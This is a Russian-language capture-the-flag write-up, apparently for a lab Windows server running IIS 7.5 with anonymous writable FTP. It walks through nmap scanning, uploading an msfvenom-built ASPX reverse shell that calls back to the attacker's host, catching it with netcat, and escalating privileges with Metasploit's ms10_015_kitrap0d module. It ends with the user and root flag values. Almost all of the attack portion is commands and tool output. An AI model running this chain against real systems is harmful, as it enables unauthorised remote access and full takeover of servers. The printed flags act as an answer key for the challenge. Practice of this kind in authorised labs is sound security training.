Обзор сервисов
IP-адрес машины 10.10.10.5
. Проверим вывод nmap
:
$ nmap -sV -sC -Pn -oN 10.10.10.5 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FTP
Из вывода nmap
видим, что открыт безпарольный доступ к FTP с файлами веб-сервера, а на интерфейсе вебки висит стандартный IIS-сервер. Похоже, что это один и тот же каталог.
Проверим, можем ли мы загрузить файл:
$ echo test > test.txt
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||49383|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************| 6 49.23 KiB/s --:-- ETA
226 Transfer complete.
6 bytes sent in 00:00 (0.02 KiB/s)
ftp> exit
221 Goodbye.
Загрузка файлов разрешена и происходит в тот же каталог, который обслуживается веб-сервером.
Приготовим реверс-шелл и запустим его.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.93 LPORT=4242 -f aspx > shell.aspx
nc -lnvp 4242
Загрузим файл по схеме выше и перейдем по ссылке http://10.10.10.5/shell.aspx
.
Повышение привилегий
Дальше я переделал шелл в meterpreter и запустил local_exploit_suggester
, который выдал следующие варианты:
[*] 10.10.10.5 - Collecting local exploits for x86/windows…
[*] 10.10.10.5 - 186 exploit checks are being tried…
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.10.5 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
3 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
6 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
8 exploit/windows/local/ms15_004_tswbproxy Yes The service is running, but could not be validated.
9 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
10 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
11 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
12 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
13 exploit/windows/local/ms16_075_reflection_juicy Yes The target appears to be vulnerable.
14 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
15 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
Воспользуемся ms10_015_kitrap0d
:
msf6 exploit(windows/local/ms10_015_kitrap0d) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.93 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 2K SP4 - Windows 7 (x86)
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0
lhost => 10.10.16.93
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
Пользовательский флаг
C:\Users\babis\Desktop>type user.txt
536af083892e5ed2c7a952278d6dbe72
Флаг суперпользователя
C:\Users\Administrator\Desktop>type root.txt
3d15bf505edd2f431b35d688ab38385e